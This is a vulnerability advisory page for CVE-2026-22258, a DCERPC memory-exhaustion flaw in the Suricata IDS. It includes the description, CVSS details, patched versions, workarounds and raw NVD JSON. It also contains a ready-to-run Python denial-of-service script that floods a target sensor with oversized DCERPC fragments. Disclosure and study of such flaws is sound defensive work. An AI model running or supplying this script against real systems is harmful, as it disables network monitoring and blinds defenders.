Security Vulnerability Report
中文
CVE-2026-22258 CVSS 7.5 HIGH

CVE-2026-22258

Published: 2026-01-27 17:16:12
Last Modified: 2026-01-30 20:09:24
Source: [email protected]

Description

Suricata is a network IDS, IPS and NSM engine. Prior to versions 8.0.3 and 7.0.14, crafted DCERPC traffic can cause Suricata to expand a buffer w/o limits, leading to memory exhaustion and the process getting killed. While reported for DCERPC over UDP, it is believed that DCERPC over TCP and SMB are also vulnerable. DCERPC/TCP in the default configuration should not be vulnerable as the default stream depth is limited to 1MiB. Versions 8.0.3 and 7.0.14 contain a patch. Some workarounds are available. For DCERPC/UDP, disable the parser. For DCERPC/TCP, the `stream.reassembly.depth` setting will limit the amount of data that can be buffered. For DCERPC/SMB, the `stream.reassembly.depth` can be used as well, but is set to unlimited by default. Imposing a limit here may lead to loss of visibility in SMB.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:oisf:suricata:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:oisf:suricata:*:*:*:*:*:*:*:* - VULNERABLE
Suricata < 7.0.14
Suricata < 8.0.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 """ CVE-2026-22258 PoC - Suricata DCERPC Memory Exhaustion This PoC demonstrates sending crafted DCERPC traffic to trigger memory exhaustion. Note: For authorized security testing only. """ import socket import struct import random def create_dcerpc_fragment(is_last_frag=True, data_size=4000): """Create a DCERPC fragment with oversized data""" # DCERPC Fragment header (16 bytes) version = b'\x05' packet_type = b'\x00' # Bind or Alter context packet_flags = b'\x03' if is_last_frag else b'\x01' # Data representation endian = b'\x10' # Little-endian # Fragment length (including header) frag_length = 16 + data_size # Auth length (no auth) auth_length = b'\x00\x00' # Call ID call_id = struct.pack('<I', 1) # Fragment header header = version + packet_type + packet_flags + endian header += struct.pack('>H', frag_length) # Big-endian for length header += auth_length + call_id # Payload - oversized data to exhaust memory payload = header + (b'\x41' * data_size) return payload def exploit_cve_2026_22258(target_ip, target_port=135, protocol='udp', duration=60): """ Send crafted DCERPC packets to exhaust Suricata memory Args: target_ip: Target Suricata sensor IP target_port: DCERPC port (135 for SMB, 49152+ for dynamic) protocol: 'udp' or 'tcp' duration: Attack duration in seconds """ print(f"[*] Starting CVE-2026-22258 exploit against {target_ip}:{target_port}") print(f"[*] Protocol: {protocol.upper()}") if protocol.lower() == 'udp': sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) else: sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.connect((target_ip, target_port)) import time start_time = time.time() packet_count = 0 try: while time.time() - start_time < duration: # Create oversized DCERPC fragments payload = create_dcerpc_fragment(is_last_frag=False, data_size=65535) try: sock.send(payload) packet_count += 1 if packet_count % 100 == 0: print(f"[*] Sent {packet_count} packets...") except Exception as e: print(f"[!] Send error: {e}") break time.sleep(0.01) # Small delay finally: sock.close() elapsed = time.time() - start_time print(f"[*] Attack completed. Sent {packet_count} packets in {elapsed:.2f}s") if __name__ == '__main__': import sys if len(sys.argv) < 2: print("Usage: python3 cve_2026_22258_poc.py <target_ip> [port] [protocol]") print("Example: python3 cve_2026_22258_poc.py 192.168.1.100 135 udp") sys.exit(1) target = sys.argv[1] port = int(sys.argv[2]) if len(sys.argv) > 2 else 135 proto = sys.argv[3] if len(sys.argv) > 3 else 'udp' exploit_cve_2026_22258(target, port, proto)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-22258", "sourceIdentifier": "[email protected]", "published": "2026-01-27T17:16:12.253", "lastModified": "2026-01-30T20:09:24.067", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Suricata is a network IDS, IPS and NSM engine. Prior to versions 8.0.3 and 7.0.14, crafted DCERPC traffic can cause Suricata to expand a buffer w/o limits, leading to memory exhaustion and the process getting killed. While reported for DCERPC over UDP, it is believed that DCERPC over TCP and SMB are also vulnerable. DCERPC/TCP in the default configuration should not be vulnerable as the default stream depth is limited to 1MiB. Versions 8.0.3 and 7.0.14 contain a patch. Some workarounds are available. For DCERPC/UDP, disable the parser. For DCERPC/TCP, the `stream.reassembly.depth` setting will limit the amount of data that can be buffered. For DCERPC/SMB, the `stream.reassembly.depth` can be used as well, but is set to unlimited by default. Imposing a limit here may lead to loss of visibility in SMB."}, {"lang": "es", "value": "Suricata es un motor de IDS, IPS y NSM de red. Antes de las versiones 8.0.3 y 7.0.14, el tráfico DCERPC manipulado puede hacer que Suricata expanda un búfer sin límites, lo que lleva al agotamiento de la memoria y a la terminación del proceso. Aunque se informó para DCERPC sobre UDP, se cree que DCERPC sobre TCP y SMB también son vulnerables. DCERPC/TCP en la configuración predeterminada no debería ser vulnerable, ya que la profundidad de flujo predeterminada está limitada a 1 MiB. Las versiones 8.0.3 y 7.0.14 contienen un parche. Algunas soluciones alternativas están disponibles. Para DCERPC/UDP, deshabilite el analizador. Para DCERPC/TCP, la configuración 'stream.reassembly.depth' limitará la cantidad de datos que se pueden almacenar en búfer. Para DCERPC/SMB, también se puede usar 'stream.reassembly.depth', pero está configurado como ilimitado por defecto. Imponer un límite aquí puede llevar a la pérdida de visibilidad en SMB."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-400"}, {"lang": "en", "value": "CWE-770"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:oisf:suricata:*:*:*:*:*:*:*:*", "versionEndExcluding": "7.0.14", "matchCriteriaId": "5302B0F0-AF2D-4140-BC66-9186EF7E455D"}, {"vulnerable": true, "criteria": "cpe:2.3:a:oisf:suricata:*:*:*:*:*:*:*:*", "versionStartIncluding": "8.0.0", "versionEndExcluding": "8.0.3", "matchCriteriaId": "E7DA8362-52A2-4ACC-83F7-CA2E77AE89C6"}]}]}], "references": [{"url": "https://github.com/OISF/suricata/commit/39d8c302af3422a096b75474a4f295a754ec6a74", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/OISF/suricata/commit/f82a388d0283725cb76782cf64e8341cab370830", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/OISF/suricata/security/advisories/GHSA-289c-h599-3xcx", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory"]}, {"url": "https://redmine.openinfosecfoundation.org/issues/8182", "source": "[email protected]", "tags": ["Issue Tracking", "Permissions Required"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.